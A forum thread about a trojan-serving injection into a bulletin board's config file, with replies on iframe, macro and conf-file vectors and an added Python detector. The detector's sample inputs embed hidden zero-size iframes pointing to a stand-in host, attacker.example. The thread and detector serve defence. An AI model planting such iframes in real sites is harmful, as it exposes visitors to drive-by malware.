
Hacking / Trojan Attempts on the MLW Forums


Greg (Forum Admin)

Thanks for all the emails and the notifications about the trojan virus that was appearing in these forums. Somehow a hacker was able to modify a config file for the forum software and insert a rather nasty browser exploit that attempted to download and install a trojan into anyone using IE. How the hacker was able to do this is still a mystery; however, all FTP and forum admin passwords have been changed and the file permissions (on the server) have been reviewed and updated.

I spent all today reinstalling and reconfiguring the forums, and it looks like no real damage was done.

I apologize for the downtime. I accidentally deleted the thread that included some instructions on how to remove the trojan; however (I was infected too!), almost any reputable anti-virus software package should remove it. I'm using Trend Micro, and it removed the viruses easily.

Trend Micro has a free virus checker/remover here: http://www.trendmicro.com/hc_intro/default.asp

Again, sorry about the problems, I will investigate this incident further and report back if I find out anything more.


Dear Greg,

Seems that this malady is common...

http://www.churchofcriticalthinking.com/fo...t=0entry10784

from the administrator..

Everything is chmod'd properly. I've double-checked. As far as I can tell the exploits have to do with vulnerabilities in the Bulletin Board software that make the board wrapper editable without being the Administrator. So someone can insert a line in the board wrapper that inserts an image or other code. They are usually within an iframe tag. Removing it is a headache, but as simple as finding the iframe tag and removing the contents.

There seems to be another similar exploit that does basically the same thing but tries to hide it by setting up a board macro, and then just inserting a call to that macro in the board wrapper. So there's no iframe tag. But in its place is an odd macro. Also easily identifiable and removable.

There's one more exploit that replaces/inserts key lines in the board's conf file. I've confirmed it's chmod'd properly, but it's still vulnerable. I keep a backup copy of the conf file so when this gets attacked I just replace it with the backup.

So far, that's what I've been up against. Oh, and there was the one attack that ended up removing all but one forum, and lumping all the conversations together. I have no idea how that was done, but I don't know what I can do about it.

Well done, though, and thanks for your efforts!

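The three injection vectors the quoted administrator lists (an iframe dropped into the board wrapper, a macro defined to carry the payload and then called from the wrapper, and key lines replaced in the conf file, which is also what hit Greg's board) can all be checked for mechanically instead of reading templates line by line. The Python below is an added example and is not code from this thread or from the forum software. The wrapper, macro and conf samples are constructed stand-ins for whatever the real board files contain, the macro call syntax `<{NAME}>` and the `$INFO[...]` conf lines are assumed, and `forums.example` / `attacker.example` are placeholder hosts.

```python
import difflib
import hashlib
import re

# --- Constructed sample inputs (stand-ins, not taken from the thread) ----------
CLEAN_WRAPPER = (
    "<html><head><title>Forums</title></head>\n"
    "<body>\n"
    "<% HEADER %>\n"
    "<% BOARD %>\n"
    "<% FOOTER %>\n"
    "</body></html>\n"
)
# Vector 1: a hidden iframe appended just before </body>.
IFRAME_WRAPPER = CLEAN_WRAPPER.replace(
    "</body>",
    '<iframe src="http://attacker.example/x.php" width="0" height="0" '
    'style="visibility:hidden"></iframe>\n</body>',
)
# Vector 2: no iframe in the wrapper, only a call to a macro that carries it.
# The <{NAME}> call syntax is an assumption for this example.
MACRO_WRAPPER = CLEAN_WRAPPER.replace("<% FOOTER %>", "<% FOOTER %>\n<{SYSUPD}>")
MACROS = {
    "LOGO": '<img src="style_images/logo.gif" alt="logo" />',
    "SYSUPD": '<iframe src="http://attacker.example/u.php" width=0 height=0></iframe>',
}
# Vector 3: the conf file with one line altered (constructed $INFO[] layout).
CLEAN_CONF = (
    "$INFO['sql_driver'] = 'mysql';\n"
    "$INFO['board_url'] = 'http://forums.example';\n"
    "$INFO['html_dir'] = '/home/forum/html';\n"
)
TAMPERED_CONF = CLEAN_CONF.replace(
    "$INFO['html_dir'] = '/home/forum/html';",
    "$INFO['html_dir'] = 'http://attacker.example/tpl';",
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>(?:.*?</iframe>)?", re.I | re.S)
# Zero size or invisible styling is the usual signature of a drive-by iframe.
HIDDEN_RE = re.compile(
    r"""(?:\b(?:width|height)\s*=\s*["']?0+(?:px)?["']?)|visibility\s*:\s*hidden|display\s*:\s*none""",
    re.I,
)
MACRO_CALL_RE = re.compile(r"<\{([A-Z0-9_]+)\}>")


def find_iframes(text):
    """Return (line_no, snippet, hidden) for every iframe tag in a template."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0), bool(HIDDEN_RE.search(m.group(0)))))
    return hits


def find_suspicious_macros(wrapper, macros, own_host):
    """Names of macros called from the wrapper whose body contains an iframe,
    a script tag, or an absolute URL pointing at a host other than our own."""
    bad = []
    for name in MACRO_CALL_RE.findall(wrapper):
        body = macros.get(name, "")
        foreign = [h for h in re.findall(r"https?://([^/\s\"'>]+)", body, re.I)
                   if h.lower() != own_host.lower()]
        if IFRAME_RE.search(body) or re.search(r"<script\b", body, re.I) or foreign:
            bad.append(name)
    return bad


def conf_digest(text):
    return hashlib.sha256(text.encode()).hexdigest()


def conf_changes(baseline, current):
    """Changed lines relative to the known-good backup; empty when untouched."""
    if conf_digest(baseline) == conf_digest(current):
        return []
    diff = difflib.unified_diff(baseline.splitlines(), current.splitlines(),
                                "conf.php.bak", "conf.php", lineterm="", n=0)
    return [l for l in diff
            if l.startswith(("+", "-")) and not l.startswith(("+++", "---"))]


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_WRAPPER), ("iframe", IFRAME_WRAPPER)):
        print(label, find_iframes(text))
    print("macros:", find_suspicious_macros(MACRO_WRAPPER, MACROS, "forums.example"))
    print("conf:", conf_changes(CLEAN_CONF, TAMPERED_CONF))
```

To use this against a live board, read the template, macro and conf files from disk in place of the constructed strings, and keep the baseline copy (or at least its hash) somewhere the web server account cannot write, since a backup sitting next to the conf file with the same permissions can be overwritten by the same attacker.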

Greg (Forum Admin)

Quote: There's one more exploit that replaces/inserts key lines in the board's conf file.

This is exactly what happened, but it took almost all day to figure it out. I was examining so many lines of code in the templates that my eyes were going cross-eyed, and then I finally looked in the config file and found the problem.

However, I've completely reinstalled the forum and confirmed the file permissions, just to be on the safe side.

Thanks for doing some research, you can never have enough ideas being tossed around.

Cheers!


It is a Windows exploit; if any of you have auto updates on, then you would be OK.

Do your MS Windows updates.

Update your AV and spyware software.

Scan scan scan.

http://www.microsoft.com/technet/security/...ory/912840.mspx

http://www.microsoft.com/technet/security/...n/ms06-001.mspx

I was really f**kin' surprised when our LAN team did not catch this. Not surprised that they have not done the updates recently. I notified my managers of the virus. Update your Windows and this should not happen again to your system. Well, I was sad I could not surf to here today, until now, and that makes me happy. Good job Greg.
